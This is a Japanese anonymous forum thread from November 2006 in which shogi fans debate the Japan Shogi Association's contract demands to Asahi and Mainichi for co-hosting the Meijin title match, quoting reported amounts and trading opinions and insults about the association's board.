朝日毎日は、共同歩調を取って、プロ棋戦から撤退するのだろ。
たぶん、それが新聞読者にはいちばんわかりやすい。

254 :名無し名人:2006/11/09(木) 21:52:05 ID:Y3h03+/t
朝日は本当のところ、どう思っているんだろうね。
当初思い描いていたシナリオとは、はっきり狂っているだろうからね。


255 :名無し名人:2006/11/09(木) 21:53:23 ID:xlheagR/
おまえら馬鹿だなー

こういうのは考えられる最高額を言うもんなんだよ。
通らないのを分かっててもな。

256 :名無し名人:2006/11/09(木) 21:55:23 ID:oT7NYFHO
1兆円

257 :名無し名人:2006/11/09(木) 21:55:32 ID:Y3h03+/t
>>255
アドバンテージを持っているときはそれでもいいかもしれないが、
今の連盟に果たしてアドバンテージはあると思うかい?

258 :名無し名人:2006/11/09(木) 22:04:25 ID:syx+uaUJ
おいおい、トラは二宮清純との対談で、
「竜王戦の契約は名人戦の少し後なので、契約金で名人戦を下回ることはありえない」
みたいなこといってたぞ。
名人戦の契約金を見て、少し上乗せできるからだそうだ。
スポンサーをみくだす連盟理事の体質からして、上の発言はマヂだと思う。
連盟は、名人戦の契約金を上積みできれば、竜王戦も自動的に高くなると考えているんだよ。

259 :名無し名人:2006/11/09(木) 22:09:03 ID:Y3h03+/t
寅の狸の皮算用だね。

260 :名無し名人:2006/11/09(木) 22:11:54 ID:c0Ch/hZm
朝日単独案と天秤にかければこれぐらいが妥当と思うが。
朝日は5億4500払って単独でやるか、3億3000で共催か
毎日は3億3000払って共催やるか、新棋戦か、撤退か
こうやって見ると名人戦を手に入れて協力金払わなくてよさそうな
朝日にとっては、共催でも割りがよさそうだ。
対して毎日は単独から共催になったにも関わらずお値段据え置きはイタイ。
まぁ現在の両者の立場を見ればこれも妥当か。

261 :名無し名人:2006/11/09(木) 22:37:33 ID:bl+uYbXm
これから交渉がはじまるんだろうが、主催権を確保した新聞社側はもう急ぐ必要はない。
順位戦の制度改革も要求してくるかもしれないし、結構時間がかかりそうだ。年内にまとまるかな。



262 :名無し名人:2006/11/09(木) 22:45:32 ID:3V0OsWmh
高い契約料を払って名人戦を共催するより、
共催すると見せかけて、契約料払わずに、名人戦問題のごたごたを
記事にするほうが、経費削減になるばかりか新聞も売れるんだよ。
万一名人戦が1年休戦になっても王将戦や朝日オープンがあるから、
新聞社側としては全く困らないし。

263 :名無し名人:2006/11/09(木) 22:46:48 ID:/v/vj8kU
連盟は「将棋から撤退できるもんなら撤退してみろ」という気でいるからな。
少なくとも名人がコンピュータより強い内は、まだ連盟の売り手市場だと思っている。
で、それはあながち間違ってはいない。
これは理事会の思いつきではなく、経営諮問委員会の差し金。

264 :名無し名人:2006/11/09(木) 22:51:34 ID:Y3h03+/t
将棋から撤退はしなくても、連盟から撤退するという線はどうなのかね。


265 :名無し名人:2006/11/09(木) 22:57:30 ID:59itqkUi
まあ、契約がまとまらないなんてことはないと思うよ。少なくとも朝日はどういう形であれ名人戦が欲しくて仕方がない。
5億円以上出せると最初に言ったのも朝日だし、共催案にもすんなり乗った。

連盟が強気になるのも目に見えない勝算があるからじゃない?
ここでの予言というか妄想がちっとも実現しないことも考えるとw

266 :名無し名人:2006/11/09(木) 23:00:11 ID:/v/vj8kU
>>264
その点についての解説は>>139が明快。

267 :名無し名人:2006/11/09(木) 23:00:51 ID:Y3h03+/t
強気というか、周りが見えていない非常識、馬鹿としか思えないけどね。


268 :名無し名人:2006/11/09(木) 23:06:01 ID:7LLuRAkq
正直びっくりして、反省した。
ここは将棋板だから、妥当な金額を予想できることよりも
将棋脳の考える金額を予想できる方が価値が高いことを
思い知らされた。
両新聞社の提示案は名人戦契約金のみだろうから4億
円弱という予想は大きく外していないはずだが。

普及協力金や名人戦協賛金なんて項目をつけたら、金
が全てな将棋連盟って叩かれるのは自明なのが解らな
い所も素晴らしきかな将棋脳。

269 :名無し名人:2006/11/09(木) 23:08:57 ID:Y3h03+/t
馬鹿丸出しで醜態を晒した(自覚はないようだが・・・)連盟が、
結果オーライで焼け太りになるようじゃあ、アホらしい限りだ。
馬鹿には馬鹿に、チョンボにはチョンボに相応しいペナルティが
与えられるべきだと思う。

270 :名無し名人:2006/11/09(木) 23:11:58 ID:XUnIM6LP
毎日新聞社もあれほどの辱めを受けながら、よく懲りないよな。

271 :名無し名人:2006/11/09(木) 23:11:59 ID:Ma10rHpQ
持久戦になるんだろうなあ。
来年の夏までにまとまるのかね?

272 :名無し名人:2006/11/09(木) 23:13:51 ID:/v/vj8kU
>>269
しかし所詮は法人同士の契約だし。
それがイヤなら将棋ファンを辞めるなりすればいいんじゃない?
そういうファンが何万人、何十万人と出れば、結局はそれがペナルティになるでしょ。


273 : ◆1py37ZPJ9A :2006/11/09(木) 23:18:00 ID:Z3wtNwEc
最初にふっかけてから、あとで下げて妥協したようにみせるというのも分かるけど、
ずいぶんと大きく出たな。

合意時コメントの新聞社の反発を受けて、連盟から交渉額をリーク(?)
これは、発表することで交渉が有利になるとみたのか?
この額を新聞社は、値切ろうとしているのかというアピールなのか、
それとも、中原がうっかり額をいってしまったのか。


274 :名無し名人:2006/11/09(木) 23:19:01 ID:Y3h03+/t
>>272
もうやめてるよ。
結果に関わらず、連盟の態度に呆れ返った。
どこの新聞社がどうなろうと、知ったことではない。どうでもいい。
連盟のタコっぷりに呆れたね。


275 :名無し名人:2006/11/09(木) 23:23:36 ID:/yPwcCCn
貧しい国の観光旅行客相手の店の常套手段だよなぁw
でも、「あんたが買ってくれないんなら、他のお客さんに売るから別にいいよ」って
言えないのが連盟の辛いところだな・・・

276 :名無し名人:2006/11/09(木) 23:25:40 ID:Z3wtNwEc
ごめん、額の詳細発表されてた。
中原のうっかりじゃない。

http://hobby.nikkei.co.jp/shogi/news/index.cfm?i=20061109s1000s1
> ・朝日・毎日両社に対し
>  名人戦契約金 年 各2億円(5年契約)
>  名人戦振興金 年 各3000万円(5年間)
>  普及協力金  年 各1億円(5年間)
>     (小計    年 6億6000万円)
> ・毎日に対し
>  王将戦契約金 年 7800万円以上
> ・朝日に対し
>  朝日オープンに代わる新棋戦契約金 年8000万円

名人戦振興金という新しいのでたな。


277 :名無し名人:2006/11/09(木) 23:26:17 ID:OgcScquq
連盟=将棋ではないし。

278 :名無し名人:2006/11/09(木) 23:27:28 ID:/v/vj8kU
>>273
契約金本体が4億というのがミソかね。
「最悪でもこの金額以下では妥協しませんよ」ってサインだろう。
あとの普及協力金とかは王将戦との交渉材料。

>>275
新聞社に買って貰わないと結局は無意味だからねぇ……。

279 :名無し名人:2006/11/09(木) 23:27:48 ID:Y3h03+/t
いや連盟=将棋でいいですよ。
将棋=連盟ではないんですよ。

280 :名無し名人:2006/11/09(木) 23:27:53 ID:59itqkUi
>>274
でもこのスレでネチネチ理事会を叩くのは辞めないとw
「契約云々より、単に米長を始めとする理事会が憎たらしくて仕方がない」って正直に書けばいいのに。

281 :名無し名人:2006/11/09(木) 23:29:21 ID:Y3h03+/t
>>280
ちがう。連盟全体の責任。
米長だけが悪いのではないよ。

282 :名無し名人:2006/11/09(木) 23:29:39 ID:ni0G2Mfi
金で揉めてるの丸出しで笑える
世間はそういう醜聞には興味持っても
問題が収まったとき将棋自体には興味持ってくれないぞ、きっと

283 :名無し名人:2006/11/09(木) 23:33:26 ID:59itqkUi
>>281
どちらでも同じことだ。
溜飲を下げる為に叩いてるという現実には変わるまい。

284 : ◆1py37ZPJ9A :2006/11/09(木) 23:33:30 ID:Z3wtNwEc
参考

現在の契約金
○名人戦 3億3400万円/年
○王将戦 7800万円/年
○朝日オープン 1億3480万円/年

朝日の単独主催案(3月17日)
○5年契約
○名人戦契約金 3億5500万円/年
○将棋普及協力金 1億5000万円/年
○臨時棋戦契約金 4000万円/年

毎日の単独主催案(6月29日)
○7年契約
○名人戦契約金 3億3400万円/年
○普及協力金 3000万円/年
○王将戦を維持 7800万円/年

米長の共催案(5月)
○契約期間は5年間を基本
○名人戦契約金 4億7000万円を上回ること
○将棋普及協力金、改めて話し合う。
○臨時棋戦、改めて話し合う。

285 :名無し名人:2006/11/09(木) 23:36:27 ID:/v/vj8kU
>>284
落としどころとして現実的なところは5月の米長案ってことになるのかな?
契約金本体は下がってはいるが……。

286 :名無し名人:2006/11/09(木) 23:38:54 ID:Y3h03+/t
普及協力金の名目がよくわからないな。
要するに寄付金出せ!ってことか。

287 :名無し名人:2006/11/10(金) 00:01:13 ID:7MFSKB61
名人戦振興金って、なにに使うの?

288 :名無し名人:2006/11/10(金) 00:11:34 ID:bLsTuJIJ
>>286
・契約金自体は竜王戦を上回ることのないようにした調整金。
・契約金より連盟が自由に使える金らしい。

289 :名無し名人:2006/11/10(金) 00:40:20 ID:l6i3RN6l
>>272
将棋ファン=将棋連盟理事会支持者じゃないからね。
ファンは連盟ではなく、将棋というゲームや将棋棋士のファンなんだ。
連盟(理事会)のやりかたに愛想がつきても、将棋ファンを辞める必要はない。

本件と個々の棋士の関係でいうと、表決前に毎日支持を表明した
羽生、森内、渡辺らは立派だったと思う。

290 :名無し名人:2006/11/10(金) 00:50:08 ID:l6i3RN6l
>>276
>http://hobby.nikkei.co.jp/shogi/news/index.cfm?i=20061109s1000s1
日経記事の一覧表はわかりやすいね。
・・・・将棋連盟理事会のふっかけぶりが。

現状の契約や3月の朝日提案に対して、いったいどういう根拠があって
2億7000万円も上乗せしてんだ?
どこから2億7000万円もの価値が発生したんだ?

291 :名無し名人:2006/11/10(金) 01:22:52 ID:Pcul0Aa5
>>290
朝日案には王将戦7800万が含まれていない。
残り1億9500。
これが毎日の棋戦契約金ってことでしょ。

あと普及協力金、名人戦振興金の2億6000は一時金。
朝日オープンに代わる新棋戦も続くか分からないので
実質3億ぐらいは一時金。

292 :名無し名人:2006/11/10(金) 01:31:03 ID:M4zoym3C
「おじさん、たこ焼きくださいな。」

「あいよ。350円。」

「あれ。彼女と二人で食べるのか?それなら、660円。」

泥沼亭のたこ焼きはうまいよ。

293 :名無し名人:2006/11/10(金) 01:32:37 ID:l6i3RN6l
>>291
>朝日案には王将戦7800万が含まれていない。

それを足すなら、名人戦が単独から共催になった分の負担を減らすのが当然だ。
こんな一方的な(連盟だけが得をする)足し算をして連盟の収入は2倍だ!と
発想できる(スポンサーに要求できる)理事会の発想・神経はある意味うらやましい、
とだけ言っておく。

294 :名無し名人:2006/11/10(金) 01:34:48 ID:AIy2pAug
「ついでに彼女も食べさせておくれ。」

泥沼亭のたこ焼きはうまいよ。


295 :名無し名人:2006/11/10(金) 01:36:23 ID:l6i3RN6l
>>294
そういうのは米長スレでやって。

296 :名無し名人:2006/11/10(金) 01:40:35 ID:AIy2pAug
あいよっ!

297 :名無し名人:2006/11/10(金) 01:58:09 ID:nTdC2y37
日本古来の伝統文化などといくら大上段に構えても、
歌謡曲や演歌、詩吟、浪曲、寄席芸能、はたまた日本プロ野球、大相撲と。
どの分野を見てもフラット社会のデフレ経済下で、衰退傾向だと思うんだが。

おまけに新聞社なんてITに押されて軒並み業績ダウン。
含み益で細々と過去のステイタスを維持しているような会社を相手に、
なんで将棋だけ、価値がアップするというんじゃい?

気がしれない。

298 :名無し名人:2006/11/10(金) 02:30:41 ID:1VmB4gFr
それにしても名人戦振興金ってなんだんだよ。
どうして名人戦には振興金が必要で竜王戦や棋聖戦には振興金は不要なんだよ。
もう対読売との兼ね合いで数字合わせしているうちに不足分が出たんで、それを
無理やり振興金って名目で計上したんだな。
新聞社の広告収入が毎年逓減している現状を知らないのかな。
まぁ、それにしてもたいした度胸だ。ある意味立派。
理事会は名人戦が共催になった時点で朝日毎日両単独案は白紙になったことが
分かってないのかな。
普及協力金なんて棋戦の運営や契約には全く関係のないもの。
要は連盟への寄付金なわけだが、当然どうして朝日と毎日だけが連盟に寄付金を
払わなければいけないんだ、という議論が両社の社内では起きるだろうね。
普及協力金を既成事実にしたいのだろうけど新聞社は馬鹿じゃありませんから。
朝日が普及協力金を申し出たのは毎日から名人戦を奪回するためだけが目的で、
毎日が便乗したのは朝日に奪回されないためだけが目的。両社とも連盟の内部
事情なんか知ったこっちゃない。自分達だって大変なんだから。
朝日毎日は当然普及協力金やら名人戦振興金などは払う必要ないし払わない。
そうなりゃ、※がサイトで使い道を楽しげにカキコしてたのは大恥だな。
なんか※の発想って本当に金正日ソツクリだな。
もう※ジョンイルはもう北朝鮮へ亡命してくれ。


299 :名無し名人:2006/11/10(金) 02:49:08 ID:gyK0Yolh
工作員乙

300 :名無し名人:2006/11/10(金) 03:18:16 ID:+lJSqVS9
>>299
工作員、って最近じゃ夕べのID:59itqkUi くらいのようだが。まあ取りあえず、乙!

301 :名無し名人:2006/11/10(金) 03:30:48 ID:1VmB4gFr
>>299
読解力ねぇ〜なぁ〜
どこをどう読んだら誰の為の工作員になるんだよ

302 :名無し名人:2006/11/10(金) 03:52:05 ID:1VmB4gFr
それにしても理事会は普及協力金と名人戦振興金をどういう理屈をつけて
ブン盗ろうとしてるんだろ。
どうかんがえても朝毎だけが寄付金を払わされる理屈は通らない。
無理やりひねって、「それを払うのを前提として共催にしてあげたんだから
払ってちょ」、ってな感じだな。
それ以外マジで理屈がつかない。
鉄の一枚岩の理事さん達よ、さぁ、どぉーする。

303 :名無し名人:2006/11/10(金) 03:52:57 ID:sZIJRbM6
なんか連盟大きく出たな。
掲載してもらっているという謙虚な気持ちが無いようだし
一回解体した方がいいんじゃない。いつか痛い目見そうだね。

304 :名無し名人:2006/11/10(金) 04:37:19 ID:/Kw3euuR
いつか痛い目を見るとしても、騒動の張本人である米長・中原ら理事たちではなく、
比較的常識のある若い世代(羽生〜渡辺〜その下)が被害をこうむりそうだねえ。
それが理不尽で腹が立つし、若手がかわいそう。


305 :名無し名人:2006/11/10(金) 06:37:11 ID:D3X2n4et
今回の連盟の要求総額         8億1800万
現在の竜王+名人+王将+朝日 8億8830万

思うに、読売から共催の場合は撤退の話とかきてるんじゃないか?

306 :名無し名人:2006/11/10(金) 08:05:14 ID:BFhFWqP2
>305
昨日の報道に読売が参加してないのが不気味wですね。
七番勝負のさなかのせいもあるかもだけど。

ヤフーのトップ見た? 記事じゃなくて上の。
これとネット棋戦(囲碁と同じで大和証券かな)の発表なのかな、今日は。
でも、もうだまされない。羽生が絡もうと連盟ノン。

307 :名無し名人:2006/11/10(金) 09:30:42 ID:TRHt4FWG
朝日・毎日としては、このまま合意をみないまま長引かせればいいんだよ。
そしたら連盟は折れるしかなくなる。

308 :名無し名人:2006/11/10(金) 09:59:22 ID:khXgVRTM

現在の竜王+名人+王将+朝日 8億8830万

今回の連盟の要求総額         8億1800万
 2位に甘んじる竜王戦       1億4700万(3位棋聖戦1億4650万円)
                  合計 9億6500万

まあ、『序列1位』代込みだとこのくらい吹っかけるのも筋か。
よみくまは2位の契約金なら2位で良いって言ってるし。
こういう言い方ができるかな、
「序列1位なら総額8億要求すべきだし、2位なら6億弱に抑えるべきだ」

309 :名無し名人:2006/11/10(金) 10:03:39 ID:irf3Ws83
だから、名人戦は別格にしろって
全てのスポンサーに金を出してもらって
総額10億ぐらいの棋戦にして
全てのメディアで棋譜載せてもらえ
ネット中継もしろ、むしろ宣伝にもなる。

総額15億ぐらい貰っちゃえ

310 :名無し名人:2006/11/10(金) 10:29:06 ID:P7IZBT1t
毎日は前に、共催なら降りると新聞に書いてたが、あれは何だったの?

311 :名無し名人:2006/11/10(金) 10:31:14 ID:Ic81qcvs
「底のない泥沼」と秋山社長も嘆く「朝日新聞の惨状」
朝日新聞・秋山耿太郎社長、OB・本郷美則
週刊新潮(10/26)
1998年に2000億弱だった広告収入が激減し、
2005年で500億減の1400億強。

朝日新聞名人戦共催の理由、500億の収入減。
やっぱり名人戦やめますとなれば大爆笑。

312 :名無し名人:2006/11/10(金) 11:00:44 ID:RutVHD0O
>>311
朝日にも大爆笑だが、連盟にも大爆笑だな
もちろん巻き添えを食らった毎日にも

313 :名無し名人:2006/11/10(金) 12:05:16 ID:NnXBTc6r
>>304
その米長を会長に選んだのも羽生や渡辺。
可哀想でも何でもない。

314 :名無し名人:2006/11/10(金) 13:34:46 ID:ONn9Y5Zh
米以下の経営ごっこに
新聞連合がお灸をすえる番が来たな。

315 :名無し名人:2006/11/10(金) 13:50:20 ID:Hlec2wPf
連盟ごと買ったらいくらになるんだろう?
年に6億超を5年も払うなら、連盟ごと買った方が話が早いんじゃないの。


316 :名無し名人:2006/11/10(金) 14:14:59 ID:4m9A5e1E
へたな893、誘拐犯よりあくどいわな。

人質 =日本文化としての将棋
**ただし、将棋は連盟の独占物との勘違いに基づく**

予備兵=地方の連盟マンセーな高年齢将棋ファン

最終目的=使途不明の(外部からあれこれ言われなくて済む)掴み金



317 :名無し名人:2006/11/10(金) 14:55:52 ID:7pW1j1NR
>>303 >>304
※のサイトなんか読んでると、本当に普及協力金に高額の使途不明金発生、
とかで※及び理事会が刑事告発されそうな気がするぞ。

318 :名無し名人:2006/11/10(金) 15:09:25 ID:BFhFWqP2
今日の将棋記者会次第で、将棋関係記者・新聞社の性根もわかるんじゃないかな。
全社ことなかれ主義なのか、日経だけは何とか筋を通そうとするのか。

名人戦振興金って何ですか? どう使うのですか? ウチの棋戦にも要求するのですか?
それぐらい当然、聞きそうなものだ。

米長会長は名人戦の質問OK、すべてはオープンですよ、と。
といっても自分から発表する気はない。
つまり、質問できるものなら質問してみなさい、新聞社と連盟は共犯関係でしょ?と。

よみくまさん、日経・神谷さん、共同通信の部長さん、
ジャーナリストとしてのお手並み拝見します。

319 :名無し名人:2006/11/10(金) 15:19:23 ID:7pW1j1NR
>>318
今日、連盟の記者会見があるのでつか?

320 :名無し名人:2006/11/10(金) 15:33:45 ID:7pW1j1NR
>>318
米長のサイトに載ってましたね、スマソ
早く結果が知りたい
よみくま辺りが爆弾投下してくれることを期待

321 :名無し名人:2006/11/10(金) 16:12:23 ID:Jgteo0Id
週刊将棋を廃刊、連盟とファンを結ぶネットによる新媒体を創刊
(ソース・毎日新聞)
http://www.mainichi-msn.co.jp/entertainment/shougi/news/20061110ddm035040075000c.html



322 :名無し名人:2006/11/10(金) 16:13:46 ID:PWNYc04T
>>321
嘘つき

323 :名無し名人:2006/11/10(金) 16:21:57 ID:BFhFWqP2
>320
そっすね。今日は記者会でヤフーの件、ネット棋戦の件を発表らしいけど、
連盟は、そんなお目出度い日に名人戦の質問ができますか?って姿勢。

前向きな将棋の話題は棋戦やってる新聞社にもメリットのはず、
それをジャマすることはできねーべと足下見てる。

しかしヤフーのあれは何なの? いまどき、あれで喜ぶファンがいるのかな。
嬉しいのは「月下の棋士」関係者だけでは。

324 :名無し名人:2006/11/10(金) 16:58:30 ID:vHHFY3IJ
>>315
本当にその通り、あの土地が連盟のものかどうか分らないけど、
30億円もあれば経営権を買い取るのは出来そうな気がする。

325 :名無し名人:2006/11/10(金) 17:15:43 ID:vHHFY3IJ
>>323
禿胴
漏れもヤフー見てみたけど、何なんだよあれは。
あんな子供だましみたいなもの、益々ファン離れが進むんじゃねいの。
なんか文科省あたりのお役所仕事みたいな感じだな。
連盟理事会はマジで逝ってよし

326 :名無し名人:2006/11/10(金) 17:24:58 ID:APc2a6Uz
古臭い人間は要らないよ
最初はあんなもん
もっと良くしてけばいいだけだ

327 :名無し名人:2006/11/10(金) 17:35:49 ID:vHHFY3IJ
って言うか、あのヤフーサイトを発表するために
記者会見するつもりだったのか?
あんなの全然名人戦に比べたらニュースバリュー
低いジャン

328 :名無し名人:2006/11/10(金) 17:39:52 ID:BFhFWqP2
>326
つかみが大切だ
あれでは継続して見ようと思わない
儲からないとヤフーさんもひいてしまいます

そもそも、あれでは古くさすぎと思うわけ

329 :名無し名人:2006/11/10(金) 17:54:41 ID:MIRfcqQC
今日の将棋関係の重大な発表は林葉直子の自己破産じゃないの?


330 :名無し名人:2006/11/10(金) 18:34:29 ID:khXgVRTM
考えてみると、読売の出方が分からない限り常識的な5億チョイで契約できないんだな。
後から竜王は2位でいいから大幅減額と、言われたアウトなわけだし。
今まで名人戦の契約の直後に竜王戦の契約がある形から外れた為の問題で、
先に竜王戦について内諾がない限り8億と言い続けるかもしれん。
下手すると竜王戦の契約が決まるまでずるずる延びてそれこそ年を越すかも。

その読売が会見がある今日に林葉直子の自己破産をワイドショーで取り上げるとは。

331 :名無し名人:2006/11/10(金) 19:01:11 ID:Pcul0Aa5
>>328
じゃあどうするのがいいの?

332 :名無し名人:2006/11/10(金) 19:36:35 ID:APc2a6Uz
いいんだよ
最初から豪華だと、後が続かない
むしろ身の丈通りのオークションだ


333 : ◆1py37ZPJ9A :2006/11/10(金) 19:37:48 ID:AqNhLM0O
日経以外のニュース入ってきてないね。
毎日、朝日は当事者だからというのがあるのかもしれないが、
あれだけ、熱心にとりあげてた読売も、取り上げないとは。


334 :名無し名人:2006/11/10(金) 19:41:38 ID:AKvpym61
※を選んだのは棋士なんだから棋士全体が問題なんだよ。
羽生も※とは大の仲良しなんだからさ。
羽生が※と仲が悪くても羽生が※に意見するなんてことはない。
「自分ではどうにもならないので」とかいってごまかしてたわけだし。
俺に言わせると、何も言わない羽生が悪い。


335 :名無し名人:2006/11/10(金) 19:51:04 ID:pXXSA7p9
読売新聞で十段戦が1億、棋聖戦が2億
将棋は囲碁と同格、同じだけ金よこせ
これが連盟金よこせ体質の始まり。
棋聖戦は序列1位、同じ金を出すなら序列1位の棋戦でないと
こうして名人より格上の竜王戦が誕生。

◎両社合計 年8億1800万円 ( ゚д゚)ポカーン

336 :名無し名人:2006/11/10(金) 19:54:34 ID:37Ov2lS1
将棋倶楽部24を連盟に事業譲渡するようだ。
コレが、※のいっていた重大発表の一つらしい。

 2006年11月1日、社団法人日本将棋連盟と有限会社将棋倶楽部24は、(有)将棋倶楽部24のインターネット将棋対局サイト事業を(社)日本将棋連盟に譲渡することで合意に達しました。
 (有)将棋倶楽部24の運営しているインターネット対局サイト将棋倶楽部24は、会員数20万人を超える世界最大のインターネット将棋対局サイトです。(http://www.shogidojo.com/

  今後、インターネット対局サイト将棋倶楽部24は、将棋連盟の事業の一部となりますが、(有)将棋倶楽部24の代表取締役久米宏氏は、引き続きこのサイトの運営に携わります。なお事業の譲渡額については非公開とさせていただきます。


       
2006年11月10日
社団法人 日本将棋連盟
広報部




337 :名無し名人:2006/11/10(金) 19:54:52 ID:BFhFWqP2
>332
そだね。身の丈だね。

338 :名無し名人:2006/11/10(金) 19:57:39 ID:AqNhLM0O
>>336
興味深いニュースだけど、独立したスレ向きだな。
しかし、将棋関連のニュースいろいろ重なるな。


339 :名無し名人:2006/11/10(金) 20:00:12 ID:MIRfcqQC
>>336
そうなると入会金と月々の会費を納めないと将棋が指せなくなるわけか
世の中せちがらくなるねえ。



340 :名無し名人:2006/11/10(金) 20:09:58 ID:wvHKQfgm
24を買収したからには、NSNは完全に無用の長物だな

341 :名無し名人:2006/11/10(金) 20:13:08 ID:GAKSEO9X
今日、正式に記者発表だったみたいだな。

将棋連盟、毎日と朝日に6億6000万円提示 名人戦共催

 日本将棋連盟の中原誠副会長は10日、毎日新聞社と
朝日新聞社が共催で合意した名人戦について、両社に
契約金など総額で年6億6000万円を提示していることを
明らかにした。

 連盟が10月20日に提示した条件は契約金各2億円、
振興金各3000万円、普及協力金各1億円。同副会長は
「今月中旬をめどにできるだけ早く返事がほしい」と早急な
回答を求めた。これに対し、毎日は「年内をめどに話し合っていく」、
朝日は「正式な交渉は始まったばかり。毎日新聞社とともに
誠意を持って交渉に当たりたい」とコメントした。

 毎日主催の王将戦に7800万円以上、朝日主催の
朝日オープン選手権に8000万円以上の契約金を
提示していることも明らかになった。


ttp://www.sanspo.com/sokuho/1110sokuho044.html

342 :名無し名人:2006/11/10(金) 20:16:03 ID:MIRfcqQC
>>341
日本将棋連盟改め日本強欲連盟あるいは日本貧乏連盟だなあ


343 : ◆1py37ZPJ9A :2006/11/10(金) 20:19:01 ID:AqNhLM0O
読売来た。

http://www.yomiuri.co.jp/national/culture/news/20061110i413.htm
> 連盟は8日、米長邦雄会長名で両社の社長に対し、
> 契約金の総額などを含めて早急に協議するよう求める文書を発送、
> 「協議が不調の場合は、朝日単独主催案に戻さざるを得ない」としている。
> 中原副会長は「提示額はあくまでたたき台。両新聞社から回答がないと話が進まない」。


344 :名無し名人:2006/11/10(金) 20:27:40 ID:MIRfcqQC
いきなり8億円超でたたき台かよ〜
思いっきりふっかけたとしか言いようがないなあ



345 :名無し名人:2006/11/10(金) 20:31:54 ID:BFhFWqP2
NSNには今でも
> 社団法人日本将棋連盟唯一の
> 将棋対局公式サイト
ってあるけどね。

346 :名無し名人:2006/11/10(金) 20:38:56 ID:1Tzep1jZ
>>343
朝日単独主催案に戻さざるを得ない?
なんてバカなことを。
いったん共催と決まった以上、朝日単独案はすでに白紙だ。
仮に共催がご破算になって朝日と連盟が単独主催の話し合いをすることになったとしても、
朝日が以前と同じ条件を提示してくれる保証なんてない。
それともあるのかね、そういう密約が?

共催で契約金を倍額要求とか、不調なら朝日単独案に戻すとか、デタラメにもほどがある。

347 :名無し名人:2006/11/10(金) 20:43:34 ID:37Ov2lS1
朝日単独案に戻さざるを得ないって、当の朝日の認識とはかなりズレがあるようだけど?

348 :名無し名人:2006/11/10(金) 20:45:56 ID:xZ2+8YCn
これで脅しているつもりなのかね。
毎日が抜ければ、困るのは連盟だろうに。

349 :名無し名人:2006/11/10(金) 20:52:34 ID:TyDx+imU
きょうの報道内容の、分かりやすい解説をきぼん

350 : ◆1py37ZPJ9A :2006/11/10(金) 20:53:50 ID:AqNhLM0O
http://www.yomiuri.co.jp/national/culture/news/20061110i413.htm
> 中原副会長によると、提示額は2社同額で1社当たり、契約金が2億円、
> イベント費用となる名人戦振興金が3000万円、使途を連盟側が決める将棋普及協力金が1億円。

名人戦振興金って、次期契約でも要求しそう。
名人戦振興金は別枠になってるけど、ようするに契約金に含まれている運営費の値上げ要求。
実質、名人戦契約金は4億6千万円(2億3000万×2)ってことだな。


http://www.shogi.or.jp/osirase/061101meijin.html
> 先日、日本将棋連盟より提示しました契約金ほか総額についても、
> おおむね了承されたことに感謝いたしております

あんなこというなら、もうこれ、訂正したほうが。
これにかぎらず、連盟や理事達の発言は公式非公式問わず現実とリンクしてない気がする。


351 :名無し名人:2006/11/10(金) 20:58:24 ID:FlkaiCxa
アンチ連盟派が喜色満面

352 :名無し名人:2006/11/10(金) 20:59:34 ID:APc2a6Uz
2006年11月、24インターネット事業を連盟に譲渡することで合意しました。
運営やサービスは従来通り変更ありません。
むしろより発展すると思います。また連盟さんといっしょになることで
他のいろんな可能性もふくらみ楽しみです。
今後ともよろしくお願いいたします。


お!俺の言ってた行動に出た
これで総本山24とヤフー抑えたな
ハッキリ言って遅過ぎるが、ようやく繋がった。
今後の有効活用に期待

353 :名無し名人:2006/11/10(金) 21:00:56 ID:cUuqjOXe
>>346
これは法律論の解釈になるが、総会の議決はあくまで「毎日との単独交渉案は否決」「執行部(理事会)に一任」なので
共催交渉が不調になっても総会議決そのものが白紙になるわけではない。
あくまで朝日新聞の出方次第となる。

共催交渉が決裂したら、次は朝日新聞との単独交渉。
それも不調に終われば、名人戦の交渉は宙に浮くこととなり、ここで再度臨時総会が開かれることになる。

354 :名無し名人:2006/11/10(金) 21:11:04 ID:6iZabU0V
連盟内の意識改革も順調だし
ネット関連の充実やネット棋戦も始まるし
名人戦問題も無事クリアしそうだし
将棋世界も面白くなったし
将棋の世間への露出も多くなったし
財政も潤った

アンチは、それでも米長を理事会を支持しないのか?
結局癌だったのは、古臭い棋士とか古臭い将棋ヲタだったって事なんだよ
将棋が陰気臭くなったのも、キモヲタ連中が牛耳ってたからなんだよ。
未だに卑劣な批判してる人達こそ、時代遅れの可愛そうな人達なのかもしれないね。

355 :名無し名人:2006/11/10(金) 21:15:41 ID:1Tzep1jZ
>>353
共催が不調なら朝日と単独交渉という手順に文句をつけてるわけではないです。

連盟会長が 「協議が不調の場合は朝日と単独交渉をする」と発言したのなら筋は通る。
しかし実際には、「朝日単独主催案に戻さざるを得ない」と言っている。
まるで、朝日が以前提示した案(条件)がまだ生きているかのように。
その考えは甘いよ、デタラメだよ、ということです。


356 :名無し名人:2006/11/10(金) 21:17:55 ID:751vv6wo
なんだか、どっちにしても来期の順位戦は吹っ飛びそうな予感がするよ。
こんな居直り強盗のような話が、まとまるとは思えない。


357 :名無し名人:2006/11/10(金) 21:23:21 ID:751vv6wo
>>354
釣り餌が濃すぎてちょっと・・・

358 :名無し名人:2006/11/10(金) 21:23:38 ID:wWNCUNw1
>>354
盟.>>>>>>界>>道の人だね
優先順位は逆じゃなきゃいけないのに

359 :名無し名人:2006/11/10(金) 21:31:19 ID:cUuqjOXe
>>354
あくまで是々非々だね。
名人戦のやり方は支持しない、というか出来ない。
やることなすことが後手後手。朝日に移すと言ってみたり、共催すると言ってみたり
一貫性がないこと甚だしい。一法人としてあり得ない対応ばかり。

ただ、それ以外の点においては概ね良くやっていると思う。
各論では問題ありだが、総論としては及第点と言っても良いだろう。

>>355
朝日が以前提示した案が生きてるかどうかは、朝日新聞が決めること。
連盟としては「まだ生きている」という認識なんでしょ。
その認識が一致するか食い違うかはまた別の話。

360 :名無し名人:2006/11/10(金) 21:34:18 ID:6iZabU0V
アンチの人達は結局は単に現状維持派だったって事だよ
米長が会長にならなかったら、何も実現しなかっただろうね
米長で最善だったかはともかく、他じゃここまで大きく動けなかったよ

反対する意見も十分理解できるが、対案は出ないし個人批判も酷い
批判するなら過去の全ての過ちや怠慢も批判しないとね。
やっと棋界の大掃除が始まったばかりなんだから、まだまだこれからだよ


361 :名無し名人:2006/11/10(金) 21:37:47 ID:cUuqjOXe
>>360
>アンチの人達は結局は単に現状維持派だったって事だよ

現状維持というのはどうなのかねぇ。
単に米長を叩きたいだけのキチガイが半分。
連盟の行く末を憂慮、もしくは理事会の迷走を疑問視した人間が半分。
こういうところだろう。

